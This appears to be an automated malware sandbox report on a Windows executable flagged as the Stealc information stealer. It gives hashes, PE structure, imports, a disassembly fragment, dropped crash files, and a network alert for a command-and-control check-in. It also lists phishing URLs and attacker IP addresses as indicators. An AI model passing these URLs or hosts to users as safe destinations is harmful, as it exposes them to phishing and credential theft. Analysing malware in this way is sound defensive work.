                  https://vpnassdsd1.blob.core.windows.net/vpnassdsd1/unsD.html#9-FFJWW/11-9623-VPOIK/746-001437-16337Get hashmaliciousUnknownBrowse
                  • 193.233.84.175
                  https://ramandan.blob.core.windows.net/ramandan/1.html#15/117-4966/926-74892-11463-Get hashmaliciousPhisherBrowse
                  • 193.233.84.175
                  http://z69p5gc0nk570ejit1fq6apix.ndsgfsjgffsnj.homes/4fdVxq8477PoaJ379hnzhvayyao8624EOSKQEYSWPRERBU64SNSB1959860q24Get hashmaliciousPhisherBrowse
                  • 193.233.84.88
                  https://podlkfidjf.blob.core.windows.net/podlkfidjf/Useemailmanagementtools.html#15/43-4757/934-1153896-11463Get hashmaliciousPhisherBrowse
                  • 193.233.84.175
                  No context
                  No context
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9531806774725857
                  Encrypted:false
                  SSDEEP:192:kKjF7l5EvRsPlotJ0+ihSrI3jpCZrMZtzuiFiZ24IO8TVB:ViKN+q+ihSsjrTzuiFiY4IO8X
                  MD5:41D0BF092D6AC65CB53E3F81DE99701B
                  SHA1:F4CD37A4B23C888C5D39FD9BD7716C2095CC9ED5
                  SHA-256:F9EA3A57D0312FD78F0E2E393000146DABBE233B2DE15121C73EF2D92CF20DD3
                  SHA-512:03F130FED19D4C2AABD024631CDAED1E3E8C1C3838AAE2B77505B47ED216B4886DDA55A76D0F9CFDE28BAB1ED1A8EAD33283E8E287C6E804C7361D53C527B89C
                  Malicious:true
                  Reputation:low
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.4.4.7.2.6.5.6.8.5.8.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.7.4.4.7.2.7.0.3.7.3.3.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.7.c.d.f.9.9.-.6.4.5.c.-.4.c.f.4.-.8.d.9.f.-.7.9.f.2.6.d.9.6.2.3.a.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.9.4.e.4.e.3.-.7.7.5.0.-.4.d.4.c.-.9.8.1.c.-.1.3.e.1.9.6.9.f.e.3.4.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.3.c.-.0.0.0.1.-.0.0.1.4.-.0.6.0.1.-.9.c.4.e.4.f.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.e.9.5.8.a.4.c.5.0.4.9.e.c.e.e.8.1.c.3.0.e.d.3.5.8.9.b.2.0.4.7.c.9.c.2.2.c.0.3.a.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Sep 25 13:32:06 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):67440
                  Entropy (8bit):2.0997943447641743
                  Encrypted:false
                  SSDEEP:384:FA3cR1i9qgEE2va1FMS1YaRgwCztsvbzdoIN2Q3U/:YcR1i9bEEUa1FMSFawGabzdHy
                  MD5:71A6410F704C1C5D46E4C77A357B9C34
                  SHA1:913A297623D34C0463E8A97317DC41D71BB1B86B
                  SHA-256:2DE3214985569AB8A9E0869E39DB0395F7439ACFEF65273F5BCA4637BA188A51
                  SHA-512:CF2F1016EB178E9AB6B5D35E02F400DC1AAFD56CDC960936BF01A36AEFB75443508270680001A7479E9E25C821D2FC8541766CFA2D9BE4B55032C454FECE193D
                  Malicious:false
                  Reputation:low
                  Preview:MDMP..a..... ..........f............4...............<............*..........T.......8...........T............3..........................................................................................................eJ......H.......GenuineIntel............T.......<......f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8304
                  Entropy (8bit):3.693281663328221
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJNC96qJkR6Y9lSU7TgmfBizN0pDd89b18sfcHm:R6lXJK6qJS6YvSU7TgmfUNj1PfR
                  MD5:20AFE040D60D85C788F7E8BB86E42A80
                  SHA1:ACAD97EAB9CC1C7D6FC1A4437C02D94A4DDDA042
                  SHA-256:7950EC1D0AC3A37D2C99CBD5F76F44254D2D48308670CE892AF8C8BF99597C4A
                  SHA-512:46BC28464FBEB9071012E1B8DD3992FB792E0EFBA6EBDAAE0B21274F7C50381A3DC272AAE7152DD9BE2AEC0639949E5A02571DF490B0DAC02A46A050779A83DE
                  Malicious:false
                  Reputation:low
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.8.4.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4537
                  Entropy (8bit):4.423275438775133
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zstJg77aI916WpW8VYjg4Ym8M4JXyFZo+q8eyJq8SYild:uIjfHI7b77Vx1JGom1ild
                  MD5:90EBDD3180581056042FAF7F17D5218D
                  SHA1:EB3A571F5FA530D82CB2C3069DB950BD72F0439F
                  SHA-256:78A367A40C9F833849410C5BA6168BA33B7C6DB2E2204985148D2C42D129F314
                  SHA-512:364B972D1ECB3A350333DCAD16DD38157E2C94ACB73B5DCC8BD179BFB200AB4A7E758967BBB8A2D8A67799AEACE6B15CDC3447A17022F052C7E5C775195822B0
                  Malicious:false
                  Reputation:low
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515794" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):1835008
                  Entropy (8bit):4.46526961794916
                  Encrypted:false
                  SSDEEP:6144:5IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbJ:KXD94+WlLZMM6YFH1+J
                  MD5:A3BFB7EE2963F948B3C3AF4104AD6192
                  SHA1:3BE368BEBB3E74BFA1B9FD0C92989AE855A459F3
                  SHA-256:D2903B30F059E83116075F0A176FC67BE6ED225E0DC28EB23B1B8FF723C4D10B
                  SHA-512:EAE17941BF8B664E0D0EF138FEB44FC2CA267A13311200F37DE9F08CC394792594ADC49D9311AD1DA582BA8C47BC57E9422396C44BE942781AE398492C938A42
                  Malicious:false
                  Reputation:low
                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.rzPO...............................................................................................................................................................................................................................................................................................................................................W.md........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.85531810652727
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:417'280 bytes
                  MD5:d792f4925d8e515a2aa89f5c9c157f2d
                  SHA1:e958a4c5049ecee81c30ed3589b2047c9c22c03a
                  SHA256:30b614408336deed002dcb9dbf0785e48ff68c25b1f5b5d741eac82b868ec32c
                  SHA512:f4199c1178dd1fefada4a7c9d95df88a43311b3678d6306c1a9a77a921dab61250fbb75cf6a1bc31ae2c44da40edb0a5d3e472cabbecd417d7c556b611c67086
                  SSDEEP:6144:6tp/S5kGWPTiZ76zcnljsuISDoB0X6tCPs61oGaLquQ2T6:+p/6kGWPeMQljsXKk61oGaGuQJ
                  TLSH:4294BF4392D1BFF0E52747729E2EC6E9369DF8624D1537A7231A6E1F24B01B2C12BB11
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M..A............f.......f.).)...f...u.....$.............f.......f.-.....f.*.....Rich............................PE..L......d...
                  Icon Hash:43254551554d610d
                  Entrypoint:0x4037e3
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:TERMINAL_SERVER_AWARE
                  Time Stamp:0x64F189A1 [Fri Sep 1 06:50:09 2023 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:a11cbe8ba3528a436618e8dc32e663a6
                  Instruction
                  call 00007F35CC7FC9B1h
                  jmp 00007F35CC7F8E5Eh
                  int3
                  int3
                  int3
                  call 00007F35CC7F900Ch
                  xchg cl, ch
                  jmp 00007F35CC7F8FF4h
                  call 00007F35CC7F9003h
                  fxch st(0), st(1)
                  jmp 00007F35CC7F8FEBh
                  fabs
                  fld1
                  mov ch, cl
                  xor cl, cl
                  jmp 00007F35CC7F8FE1h
                  mov byte ptr [ebp-00000090h], FFFFFFFEh
                  fabs
                  fxch st(0), st(1)
                  fabs
                  fxch st(0), st(1)
                  fpatan
                  or cl, cl
                  je 00007F35CC7F8FD6h
                  fldpi
                  fsubrp st(1), st(0)
                  or ch, ch
                  je 00007F35CC7F8FD4h
                  fchs
                  ret
                  fabs
                  fld st(0), st(0)
                  fld st(0), st(0)
                  fld1
                  fsubrp st(1), st(0)
                  fxch st(0), st(1)
                  fld1
                  faddp st(1), st(0)
                  fmulp st(1), st(0)
                  ftst
                  wait
                  fstsw word ptr [ebp-000000A0h]
                  wait
                  test byte ptr [ebp-0000009Fh], 00000001h
                  jne 00007F35CC7F8FD7h
                  xor ch, ch
                  fsqrt
                  ret
                  pop eax
                  jmp 00007F35CC7FB58Fh
                  fstp st(0)
                  fld tbyte ptr [0041169Ah]
                  ret
                  fstp st(0)
                  or cl, cl
                  je 00007F35CC7F8FDDh
                  fstp st(0)
                  fldpi
                  or ch, ch
                  je 00007F35CC7F8FD4h
                  fchs
                  ret
                  fstp st(0)
                  fldz
                  or ch, ch
                  je 00007F35CC7F8FC9h
                  fchs
                  ret
                  fstp st(0)
                  jmp 00007F35CC7FB565h
                  fstp st(0)
                  mov cl, ch
                  jmp 00007F35CC7F8FD2h
                  call 00007F35CC7F8F9Eh
                  jmp 00007F35CC7FB570h
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push ebp
                  mov ebp, esp
                  add esp, FFFFFD30h
                  push ebx
                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [IMP] VS2008 SP1 build 30729
                  • [RES] VS2010 build 30319
                  • [LNK] VS2010 build 30319
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3ff3c0x64.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x205d0000x205f8.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3ffa00x1c.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3faa00x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x110000x228.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000xf9020xfa0038841d730c2da74bdf8a2a3fe5bf625cFalse0.607609375data6.754869464813126IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x110000x2fbae0x2fc00a2229f112b18045fdfef39248a908cd4False0.9446580497382199data7.887989647367526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x410000x201b2100x5e0041f1dbad254b4ffc1719693cadcb63edunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x205d0000x205f80x206006293b69440b26f323c5bcdd91adaea4fFalse0.4011598093629344data4.7455090936889395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  ZAVUTIDORAMACE0x20764980x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilIndia0.588821322292664
                  ZAVUTIDORAMACE0x20764980x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilSri Lanka0.588821322292664
                  RT_CURSOR0x20783080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.26439232409381663
                  RT_CURSOR0x20791b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3686823104693141
                  RT_CURSOR0x2079a580x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.49060693641618497
                  RT_CURSOR0x2079ff00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                  RT_CURSOR0x207a1200xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                  RT_CURSOR0x207a1f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                  RT_CURSOR0x207b0a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                  RT_CURSOR0x207b9480x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                  RT_ICON0x205db000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.4349680170575693
                  RT_ICON0x205db000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.4349680170575693
                  RT_ICON0x205e9a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5374548736462094
                  RT_ICON0x205e9a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5374548736462094
                  RT_ICON0x205f2500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.5996543778801844
                  RT_ICON0x205f2500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.5996543778801844
                  RT_ICON0x205f9180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6748554913294798
                  RT_ICON0x205f9180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6748554913294798
                  RT_ICON0x205fe800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.3287344398340249
                  RT_ICON0x205fe800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.3287344398340249
                  RT_ICON0x20624280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilIndia0.40361163227016883
                  RT_ICON0x20624280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilSri Lanka0.40361163227016883
                  RT_ICON0x20634d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilIndia0.4663934426229508
                  RT_ICON0x20634d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilSri Lanka0.4663934426229508
                  RT_ICON0x2063e580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.5549645390070922
                  RT_ICON0x2063e580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.5549645390070922
                  RT_ICON0x20643380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.36433901918976547
                  RT_ICON0x20643380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.36433901918976547
                  RT_ICON0x20651e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4526173285198556
                  RT_ICON0x20651e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4526173285198556
                  RT_ICON0x2065a880x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.45910138248847926
                  RT_ICON0x2065a880x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.45910138248847926
                  RT_ICON0x20661500x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.45303468208092484
                  RT_ICON0x20661500x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.45303468208092484
                  RT_ICON0x20666b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2654564315352697
                  RT_ICON0x20666b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2654564315352697
                  RT_ICON0x2068c600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.30651969981238275
                  RT_ICON0x2068c600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.30651969981238275
                  RT_ICON0x2069d080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.35726950354609927
                  RT_ICON0x2069d080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.35726950354609927
                  RT_ICON0x206a1d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.5660980810234542
                  RT_ICON0x206a1d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.5660980810234542
                  RT_ICON0x206b0800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5469314079422383
                  RT_ICON0x206b0800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5469314079422383
                  RT_ICON0x206b9280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.6163294797687862
                  RT_ICON0x206b9280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.6163294797687862
                  RT_ICON0x206be900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.46141078838174276
                  RT_ICON0x206be900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.46141078838174276
                  RT_ICON0x206e4380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.48850844277673544
                  RT_ICON0x206e4380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.48850844277673544
                  RT_ICON0x206f4e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.49098360655737705
                  RT_ICON0x206f4e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.49098360655737705
                  RT_ICON0x206fe680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.4512411347517731
                  RT_ICON0x206fe680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.4512411347517731
                  RT_ICON0x20703380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.488272921108742
                  RT_ICON0x20703380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.488272921108742
                  RT_ICON0x20711e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4697653429602888
                  RT_ICON0x20711e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4697653429602888
                  RT_ICON0x2071a880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.434971098265896
                  RT_ICON0x2071a880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.434971098265896
                  RT_ICON0x2071ff00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2773858921161826
                  RT_ICON0x2071ff00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2773858921161826
                  RT_ICON0x20745980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.2898686679174484
                  RT_ICON0x20745980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.2898686679174484
                  RT_ICON0x20756400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.3069672131147541
                  RT_ICON0x20756400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.3069672131147541
                  RT_ICON0x2075fc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3395390070921986
                  RT_ICON0x2075fc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3395390070921986
                  RT_DIALOG0x207c1380x58data0.8977272727272727
                  RT_STRING0x207c1900x38cdataTamilIndia0.473568281938326
                  RT_STRING0x207c1900x38cdataTamilSri Lanka0.473568281938326
                  RT_STRING0x207c5200x56edataTamilIndia0.44316546762589926
                  RT_STRING0x207c5200x56edataTamilSri Lanka0.44316546762589926
                  RT_STRING0x207ca900x2c6dataTamilIndia0.4732394366197183
                  RT_STRING0x207ca900x2c6dataTamilSri Lanka0.4732394366197183
                  RT_STRING0x207cd580x4a2dataTamilIndia0.448566610455312
                  RT_STRING0x207cd580x4a2dataTamilSri Lanka0.448566610455312
                  RT_STRING0x207d2000x3f6dataTamilIndia0.4428007889546351
                  RT_STRING0x207d2000x3f6dataTamilSri Lanka0.4428007889546351
                  RT_ACCELERATOR0x20782d00x38dataTamilIndia0.9107142857142857
                  RT_ACCELERATOR0x20782d00x38dataTamilSri Lanka0.9107142857142857
                  RT_GROUP_CURSOR0x2079fc00x30data0.9375
                  RT_GROUP_CURSOR0x207a1d00x22data1.0588235294117647
                  RT_GROUP_CURSOR0x207beb00x30data0.9375
                  RT_GROUP_ICON0x20702d00x68dataTamilIndia0.7115384615384616
                  RT_GROUP_ICON0x20702d00x68dataTamilSri Lanka0.7115384615384616
                  RT_GROUP_ICON0x20642c00x76dataTamilIndia0.6610169491525424
                  RT_GROUP_ICON0x20642c00x76dataTamilSri Lanka0.6610169491525424
                  RT_GROUP_ICON0x206a1700x68dataTamilIndia0.7115384615384616
                  RT_GROUP_ICON0x206a1700x68dataTamilSri Lanka0.7115384615384616
                  RT_GROUP_ICON0x20764300x68dataTamilIndia0.7211538461538461
                  RT_GROUP_ICON0x20764300x68dataTamilSri Lanka0.7211538461538461
                  RT_VERSION0x207bee00x258data0.5466666666666666
                  DLLImport
                  KERNEL32.dllInterlockedDecrement, GetCurrentProcess, SetEnvironmentVariableW, CreateJobObjectW, SetComputerNameW, CreateHardLinkA, GetModuleHandleW, EnumCalendarInfoExW, GetNumberFormatA, GetWindowsDirectoryA, SetCommState, LoadLibraryW, GetLocaleInfoW, ReadConsoleInputA, GetCalendarInfoW, CreateEventA, SetVolumeMountPointA, GetConsoleAliasExesLengthW, GetVersionExW, GetFileAttributesA, EnumSystemCodePagesA, GetTimeFormatW, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, SetThreadPriority, GetTempPathW, VerifyVersionInfoW, GlobalUnfix, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetLongPathNameW, EnumCalendarInfoW, CreateNamedPipeA, LoadModule, GlobalFree, GetProcessVersion, LoadLibraryA, InterlockedExchangeAdd, CreateFileMappingA, LocalAlloc, SetCalendarInfoW, FoldStringA, EnumDateFormatsA, GlobalUnWire, GetProcessShutdownParameters, LoadLibraryExA, GetFileTime, WaitForDebugEvent, OpenEventW, GetShortPathNameW, SetFileShortNameA, GetDiskFreeSpaceExW, LCMapStringW, CommConfigDialogW, ReadFile, GetProcessHeap, SetEndOfFile, GetStringTypeW, MultiByteToWideChar, CreateFileW, WriteConsoleW, InterlockedIncrement, GetConsoleAliasExesA, TlsGetValue, SetFilePointer, GetProcAddress, SetDefaultCommConfigA, FlushFileBuffers, SetStdHandle, HeapFree, EncodePointer, DecodePointer, HeapReAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, IsProcessorFeaturePresent, WideCharToMultiByte, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, HeapCreate, Sleep, HeapSize, ExitProcess, RtlUnwind, HeapAlloc, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA
                  USER32.dllGetWindowLongW, SetCaretPos, CharUpperA, InsertMenuItemW, DrawStateA, LoadMenuA, CharLowerBuffA, GetSysColor, GetMenuStringA, SetMenu
                  GDI32.dllGetBkMode, CreateDCW, GetCharWidth32W, GetTextCharset, GetCharWidthI
                  WINHTTP.dllWinHttpCloseHandle
                  Language of compilation systemCountry where language is spokenMap
                  TamilIndia
                  TamilSri Lanka
                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-09-25T15:32:06.869553+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730193.233.113.18480TCP
                  TimestampSource PortDest PortSource IPDest IP
                  Sep 25, 2024 15:32:05.703025103 CEST4973080192.168.2.4193.233.113.184
